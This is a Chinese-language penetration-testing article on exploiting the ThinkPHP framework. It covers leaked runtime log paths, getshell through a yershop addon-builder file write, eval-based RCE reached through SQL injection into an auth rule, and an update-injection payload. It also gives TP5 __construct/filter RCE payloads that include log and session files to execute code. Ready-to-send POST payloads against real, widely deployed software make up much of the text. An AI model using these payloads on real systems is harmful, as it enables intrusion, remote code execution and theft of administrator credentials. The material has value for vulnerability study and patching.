ThinkPHP是一個快速、兼容而且簡單的輕量級國產PHP開發框架,可以支持Windows/Unix/Linux等服務器環境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多種數據庫以及PDO擴展。
Runtime日誌
在ThinkPHP3的版本中,入口文件index.php是跟應用目錄、框架目錄在同一個目錄下的,在DEBUG開啟的狀態下,會在runtime生成日誌文件,洩露一些管理員登錄後臺的賬號密碼等。tp3的日誌文件命名規則為:根目錄(或者應用目錄)/Runtime/Logs/Admin/20_08_17.log(年份前2位_月份_日.log)
在tp5的版本中,入口文件index是在public的目錄下,它跟應用目錄、框架目錄不在同一個目錄,但是有些管理員會將入口文件放置到跟應用目錄、框架目錄同目錄,tp5的命名規則為:
./runtime/log/202008/17.log(./runtime/log/年月/日.log)
file_put_contents函數
在ThinkPHP3中,後臺有時會寫入配置文件來getshell的,所以我傾向全局查找這個file_put_contents函數,然後在網上找個代碼--yershop(TP3開發的那個版本)來進行審計,後臺可以通過寫入文件來拿shell。全局查找file_put_contents函數,發現控制器AddonsController.class.php中的build存在。
發現存在兩處寫入文件,這裡第一處需要滿足以下條件:
<code>$addon_dir可控,$data可控,$addonModel可控/<code>
第二處需要滿足:
<code>$data['has_config'] == 1,$addon_dir可控/<code>
跟蹤發現$data是從全局POST獲取的,所有可控,即$addon_dir可控。
構造payload如下,後臺創建擴展。
點擊確定,抓包,首先會判斷標識名這個插件是否存在,不存在就執行build訪問。
由於要寫入config.php這個文件需要滿足$data['has_config'] == 1,最後構造payload。
訪問:index.php?s=/Admin/Addons/build.html
POST發送:
<code>info%5Bname%5D=Example&info%5Btitle%5D=%E7%A4%BA%E5%88%97&info%5Bversion%5D=0.1&info%5Bauthor%5D=%E6%97%A0%E5%90%8D&info%5Bdescription%5D=%E8%BF%99%E6%98%AF%E4%B8%80%E4%B8%AA%E4%B8%B4%E6%97%B6%E6%8F%8F%E8%BF%B0&info%5Bstatus%5D=1&config=%3C%3Fphp%0D%0Areturn+array(%0D%0A%09'random'%3D%3Earray(%2F%2F%E9%85%8D%E7%BD%AE%E5%9C%A8%E8%A1%A8%E5%8D%95%E4%B8%AD%E7%9A%84%E9%94%AE%E5%90%8D+%2C%E8%BF%99%E4%B8%AA%E4%BC%9A%E6%98%AFconfig%5Brandom%5D%0D%0A%09%09'title'%3D%3E'%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AF%E9%9A%8F%E6%9C%BA%3A'%2C%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E6%96%87%E5%AD%97%0D%0A%09%09'type'%3D%3E'radio'%2C%09%09+%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E7%B1%BB%E5%9E%8B%EF%BC%9Atext%E3%80%81textarea%E3%80%81checkbox%E3%80%81radio%E3%80%81select%E7%AD%89%0D%0A%09%09'options'%3D%3Earray(%09%09+%2F%2Fselect+%E5%92%8Cradion%E3%80%81checkbox%E7%9A%84%E5%AD%90%E9%80%89%E9%A1%B9%0D%0A%09%09%09'1'%3D%3E'%E5%BC%80%E5%90%AF'%2C%09%09+%2F%2F%E5%80%BC%3D%3E%E6%96%87%E5%AD%97%0D%0A%09%09%09'0'%3D%3E'%E5%85%B3%E9%97%AD'%2C%0D%0A%09%09)%2C%0D%0A%09%09'value'%3D%3E'1'%2C%09%09%09+%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E9%BB%98%E8%AE%A4%E5%80%BC%0D%0A%09)%2C%0D%0A)%3B%0D%0A%09%09%09%09%09&custom_config=&admin_list='model'%3D%3E'Example'%2C%09%09%2F%2F%E8%A6%81%E6%9F%A5%E7%9A%84%E8%A1%A8%0D%0A%09%09%09'fields'%3D%3E'*'%2C%09%09%09%2F%2F%E8%A6%81%E6%9F%A5%E7%9A%84%E5%AD%97%E6%AE%B5%0D%0A%09%09%09'map'%3D%3E''%2C%09%09%09%09%2F%2F%E6%9F%A5%E8%AF%A2%E6%9D%A1%E4%BB%B6%2C+%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%8F%AF%E4%BB%A5%E5%86%8D%E6%8F%92%E4%BB%B6%E7%B1%BB%E7%9A%84%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95%E9%87%8C%E5%8A%A8%E6%80%81%E9%87%8D%E7%BD%AE%E8%BF%99%E4%B8%AA%E5%B1%9E%E6%80%A7%0D%0A%09%09%09'order'%3D%3E'id+desc'%2C%09%09%2F%2F%E6%8E%92%E5%BA%8F%2C%0D%0A%09%09%09'list_grid'%3D%3Earray(+%09%09%2F%2F%E8%BF%99%E9%87%8C%E5%AE%9A%E4%B9%89%E7%9A%84%E6%98%AF%E9%99%A4%E4%BA%86id%E5%BA%8F%E5%8F%B7%E5%A4%96%E7%9A%84%E8%A1%A8%E6%A0%BC%E9%87%8C%E5%AD%97%E6%AE%B5%E6%98%BE%E7%A4%BA%E7%9A%84%E8%A1%A8%E5%A4%B4%E5%90%8D%E5%92%8C%E6%A8%A1%E5%9E%8B%E4%B8%80%E6%A0%B7%E6%94%AF%E6%8C%81%E5%87%BD%E6%95%B0%E5%92%8C%E9%93%BE%E6%8E%A5%0D%0A++++++++++++++++'cover_id%7Cpreview_pic%3A%E5%B0%81%E9%9D%A2'%2C%0D%0A++++++++++++++++'title%3A%E4%B9%A6%E5%90%8D'%2C%0D%0A++++++++++++++++'description%3A%E6%8F%8F%E8%BF%B0'%2C%0D%0A++++++++++++++++'link_id%7Cget_link%3A%E5%A4%96%E9%93%BE'%2C%0D%0A++++++++++++++++'update_time%7Ctime_format%3A%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4'%2C%0D%0A++++++++++++++++'id%3A%E6%93%8D%E4%BD%9C%3A%5BEDIT%5D%7C%E7%BC%96%E8%BE%91%2C%5BDELETE%5D%7C%E5%88%A0%E9%99%A4'%0D%0A++++++++++++)%2C%0D%0A%09%09%09%09%09&custom_adminlist=&has_config=1&config=/<code>
成功寫入config.php文件,訪問Addons/Example/config.php。
所以,在tp3開發的源碼中,全局查找file_put_contents很容易中獎。
Auth引發的RCE
在tp3中,在Auth的getAuthList方法存在eval函數,跟進代碼
ThinkPHP\Library\Think\Auth.class.php。
這裡需要滿足$command變量可控就可以rce了,$command為[表前綴]_auth_rule的condition字段,還是以yershop源碼來分析,控制權限的表為yershop_auth_rule。
所以,漏洞觸發需要向condition字段寫入惡意代碼,要利用注入且支持pdo就能寫入進去,tp3是以pdo來連接數據庫的,這裡滿足了pdo,就需要尋找注入點來getshell了。
在文件Application\Home\Controller\OrderController.class.php中的detail方法,通過I方法獲取id參數。
利用pdo修改condition字段
繼續分析,怎麼調用到getAuthList這個方法的,在Application\Admin\Controller\AdminController.class.php控制器中,調用了checkRule方法,在checkRule方法實列了Auth類,並調用了check方法。
跟進check方法:
在104行調用了我們的getAuthList方法,執行到了eval函數處。要觸發rce,從代碼中可以看到需要普通用戶的權限才會執行到checkRule方法,所以先添加一個新用戶並新增一個用戶組,給文章管理的權限。
登錄這個用戶,訪問注入修改的路由,成功rce。
SQL注入
在TP3.1.3和TP3.2.3注入都差不多,無非就表達式注入,bind注入,find/select/delete注入,order注入,在之前的文章中,分析過關於tp3.2.3的注入,這裡主要是TP5的注入。
ThinkPHP<=5.0.16 insert/update注入
在ThinkPHP5中,獲取請求方式的方法是input,在控制器中,寫個存在漏洞的demo:
<code>public function getuser(){
$username = input('get.username/a');
$user = db('user')->where(['uid'=>1])->update(['username'=>$username]);
dump($user);
}/<code>漏洞payload:
<code>username[0]=dec&username[1]=updatexml(1,concat(0x7e,user(),0x7e),1)&username[2]=1/<code>
在user變量處,斷點進行分析,直接進入update方法。
繼續跟進$this->builder->update
在parseData方法中,進行了sql語句的拼接。
當參數傳入數組的時候,下標0為exp時候,直接返回下標為1的參數值,而為inc或者dec時候,通過parseKey方法處理了下標為1的參數值,跟進查看parseKey方法:
<code>protected function parseKey($key, $options = [])
{
$key = trim($key);
if (strpos($key, '$.') && false === strpos($key, '(')) {
// JSON字段支持
list($field, $name) = explode('$.', $key);
$key = 'json_extract(' . $field . ', \'$.' . $name . '\')';
} elseif (strpos($key, '.') && !preg_match('/[,\'"\(\)`\s]/', $key)) {
list($table, $key) = explode('.', $key, 2);
if ('__TABLE__' == $table) {
$table = $this->query->getTable();
}
if (isset($options['alias'][$table])) {
$table = $options['alias'][$table];
}
}
if (!preg_match('/[,\'"\*\(\)`.\s]/', $key)) {
$key = '`' . $key . '`';
}
if (isset($table)) {
if (strpos($table, '.')) {
$table = str_replace('.', '`.`', $table);
}
$key = '`' . $table . '`.' . $key;
}
return $key;
}/<code>然而parseKey並沒有對傳入的字符進行任何過濾,所以當輸入exp,inc,dec,都返回的字符串,為什麼參數值為exp的時候不能產生注入,原因是在用input方法傳入的時候,要經過filterExp進行過濾。
<code>public function filterExp(&$value)
{
// 過濾查詢特殊字符
if (is_string($value) && preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT LIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i', $value)) {
$value .= ' ';
}
// TODO 其他安全過濾
}/<code>當匹配到exp的時候,就會在exp後面添加一個空格,導致不能同parseKey方法中的exp相等。同樣,利用insert方法向數據庫插入數據也是同種原理。由於篇幅問題,網上的分析文章也多,之後的注入不想再造輪子了,可以詳細看這個師傅的文章:https://github.com/Mochazz/ThinkPHP-Vuln
TP5 rce漏洞
TP5的rce漏洞影響版本:ThinkPHP 5.0.x ~ 5.0.23、ThinkPHP 5.1.x ~ 5.1.31、ThinkPHP 5.2.0beta1
TP5rce的分析網上也比較多了,這裡主要說下在TP滲透,php7版本的關於log文件和session文件包含的問題。
runtime文件包含拿shell
先寫入一句話到runtime日誌中,POST發送。
<code>_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=/<code>
runtime的日誌文件為./runtime/log/202008/17.log
<code>_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runtime/log/202008/17.log&cmd=phpinfo();/<code>
session文件包含拿shell
寫入session文件
<code>_method=__construct&filter[]=think\Session::set&method=get&get[]=&server[]=1/<code>
一般linux下的session文件存儲在/var/lib/php/session,session的命名為sess_[PHPSESSID]。
<code>_method=__construct&method=get&filter[]=think\__include_file&get[]=/var/lib/php/session/sess_sf9vlodcl4j4r1bhli2ddnvr32&server[]=1&cmd=phpinfo();/<code>
其實也可以用反序列化的點來,只是有點麻煩,需要去調代碼。
<code>_method=__construct&filter=unserialize&method=get&server[REQUEST_METHOD]=序列化/<code>
反序列化
反序列化點通常都是在代碼審計當中被發現的,當unserialize可控時可以觸發,但是隻光靠unserialize可控很難找到可控點,這時安全研究員Sam Thomas分享了一個關於phar反序列的漏洞,大大增加了反序列化的利用點。由於TP5-6的反序列化分析篇幅比較大,可以直接看下面文章進行深度學習:
Thinkphp5.0.24反序列:https://jfanx1ng.github.io/2020/05/07/ThinkPHP5.0.24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
Thinkphp5.1.x反序列:https://jfanx1ng.github.io/2020/05/09/ThinkPHP5.1.x%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE%E5%88%86%E6%9E%90/
Thinkphp6.x反序列:https://jfanx1ng.github.io/2020/05/13/ThinkPHP6.0%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90
phar反序列化挖掘案列:https://bbs.ichunqiu.com/thread-57947-1-1.html
今天的文章分享,小夥伴們看懂了嗎?
